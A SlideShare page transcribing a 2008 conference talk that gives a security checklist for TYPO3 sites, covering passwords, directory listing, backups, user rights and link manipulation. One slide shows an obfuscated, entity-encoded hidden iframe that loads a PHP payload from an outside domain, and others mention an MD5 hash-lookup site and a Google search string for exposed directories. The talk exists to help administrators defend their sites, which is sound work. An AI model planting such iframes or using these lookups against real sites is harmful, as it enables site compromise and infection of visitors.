SlideShare una empresa de Scribd logo

Security Checklist for TYPO3

jweiland
jweiland

Security Checklist for TYPO3

Tecnología
1 de 22
Avoiding the bad guys Security Checklist for TYPO3 International TYPO3 Conference Berlin, 2008
TYPO3 has quite a good security history...
but ... • TYPO3 is not „implement and forget“ • Regular checks and updates are required
Secure Passwords • 9 or more characters • Mixed upper/lowercase • Do not use the same password everywhere • Change regularly • Passwords are stored as md5 hash, but...
md5.rednoize.com
md5 Hash Lookup
Disable Directory Listing • in httpd.conf change Options All Indexes FollowSymLinks to Options All FollowSymLinks • Google Search intitle:quot;index ofquot; quot;last modifiedquot; size
Backup Your Data • Regularly (cronjob) • Directories: fileadmin, typo3conf, uploads • Database: mysqldump --opt > filename • Not only for the last one or two days • Copy or download to external media • Verify! • Do not store inside docroot
also check for www.domain.com/../system/ not being accessible
database.sql
md5.rednoize.com
Backend Users • Editors should NEVER have admin rights • Check list of BE users for valid entries • Temporary editors (students, contract workers): set expiration date for account
FTP Accounts • Only give access to fileadmin/user_upload/...
When crisis strikes...
• „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their quot;greetingquot;.“
iframe Attacks <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47; &#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118; &#104;&#107;&#46;&#99;&#111;&#109;&#47; &#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52; &#50;&#46;&#112;&#104;&#112;' width=1 height=1> </iframe>
Link Manipulation • www.domain.com/ index.php&L=2&www.badsite.com • Limit range of linkVars: config.linkVars = L(0-4)
Further Information • TYPO3 Security Cookbook available at typo3.org/teams/security/ • TYPO3 announce list available at lists.netfielders.de
Questions ?

Recomendados

Bypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersBypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filters
Netsparker
 
Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013
jweiland
 
TYPO3 Caching
TYPO3 CachingTYPO3 Caching
TYPO3 Caching
jweiland
 
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
jweiland
 
Make Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites FlyMake Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites Fly
jweiland
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
heikowebers
 
How Not To Code Flex Applications
How Not To Code Flex ApplicationsHow Not To Code Flex Applications
How Not To Code Flex Applications
jeff tapper
 

Recomendados

Bypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersBypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filters
Netsparker
 
Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013
jweiland
 
TYPO3 Caching
TYPO3 CachingTYPO3 Caching
TYPO3 Caching
jweiland
 
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
jweiland
 
Make Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites FlyMake Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites Fly
jweiland
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
heikowebers
 
How Not To Code Flex Applications
How Not To Code Flex ApplicationsHow Not To Code Flex Applications
How Not To Code Flex Applications
jeff tapper
 
Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
Daniel López Jiménez
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
Atlassian
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
Atlassian
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructure
Andrew Petukhov
 
Jun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By ExampleJun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By Example
360|Conferences
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Nathan Winters
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get Stung
Barry Dorrans
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!
Jeff Jones
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Apps
adunne
 
Cooking with Chef
Cooking with ChefCooking with Chef
Cooking with Chef
Orlando_Ruby_Users_Group
 
Api Design
Api DesignApi Design
Api Design
sumithra jonnalagadda
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Saumil Shah
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
hernanibf
 
Kommons
KommonsKommons
Kommons
Antonio Terreno
 
T5 Oli Aro
T5 Oli AroT5 Oli Aro
T5 Oli Aro
Javier Toledo
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
CODE BLUE
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)
Raviteja Chowdary Adusumalli
 
Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.
Jason Morrison
 
clang-intro
clang-introclang-intro
clang-intro
Hajime Morrita
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web App
elliando dias
 
Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3
jweiland
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshop
jweiland
 

Más contenido relacionado

Similar a Security Checklist for TYPO3

Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
Daniel López Jiménez
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Nathan Winters
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Apps
adunne
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
hernanibf
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
CODE BLUE
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web App
elliando dias
 

Similar a Security Checklist for TYPO3 (20)

Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructure
 
Jun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By ExampleJun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By Example
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get Stung
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Apps
 
Cooking with Chef
Cooking with ChefCooking with Chef
Cooking with Chef
 
Api Design
Api DesignApi Design
Api Design
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Kommons
KommonsKommons
Kommons
 
T5 Oli Aro
T5 Oli AroT5 Oli Aro
T5 Oli Aro
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)
 
Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.
 
clang-intro
clang-introclang-intro
clang-intro
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web App
 

Más de jweiland

Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3
jweiland
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshop
jweiland
 
30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider
jweiland
 

Más de jweiland (6)

Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshop
 
30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider
 
TYPO3 SEO
TYPO3 SEOTYPO3 SEO
TYPO3 SEO
 
Why RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix itWhy RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix it
 
Using TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needsUsing TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needs
 

Último

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
 

Último (20)

Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 

Security Checklist for TYPO3

  • 1. Avoiding the bad guys Security Checklist for TYPO3 International TYPO3 Conference Berlin, 2008
  • 2. TYPO3 has quite a good security history...
  • 3. but ... • TYPO3 is not „implement and forget“ • Regular checks and updates are required
  • 4. Secure Passwords • 9 or more characters • Mixed upper/lowercase • Do not use the same password everywhere • Change regularly • Passwords are stored as md5 hash, but...
  • 7. Disable Directory Listing • in httpd.conf change Options All Indexes FollowSymLinks to Options All FollowSymLinks • Google Search intitle:quot;index ofquot; quot;last modifiedquot; size
  • 8. Backup Your Data • Regularly (cronjob) • Directories: fileadmin, typo3conf, uploads • Database: mysqldump --opt > filename • Not only for the last one or two days • Copy or download to external media • Verify! • Do not store inside docroot
  • 10.
  • 11.
  • 14.
  • 15. Backend Users • Editors should NEVER have admin rights • Check list of BE users for valid entries • Temporary editors (students, contract workers): set expiration date for account
  • 16. FTP Accounts • Only give access to fileadmin/user_upload/...
  • 18. • „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their quot;greetingquot;.“
  • 19. iframe Attacks <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47; &#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118; &#104;&#107;&#46;&#99;&#111;&#109;&#47; &#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52; &#50;&#46;&#112;&#104;&#112;' width=1 height=1> </iframe>
  • 20. Link Manipulation • www.domain.com/ index.php&L=2&www.badsite.com • Limit range of linkVars: config.linkVars = L(0-4)
  • 21. Further Information • TYPO3 Security Cookbook available at typo3.org/teams/security/ • TYPO3 announce list available at lists.netfielders.de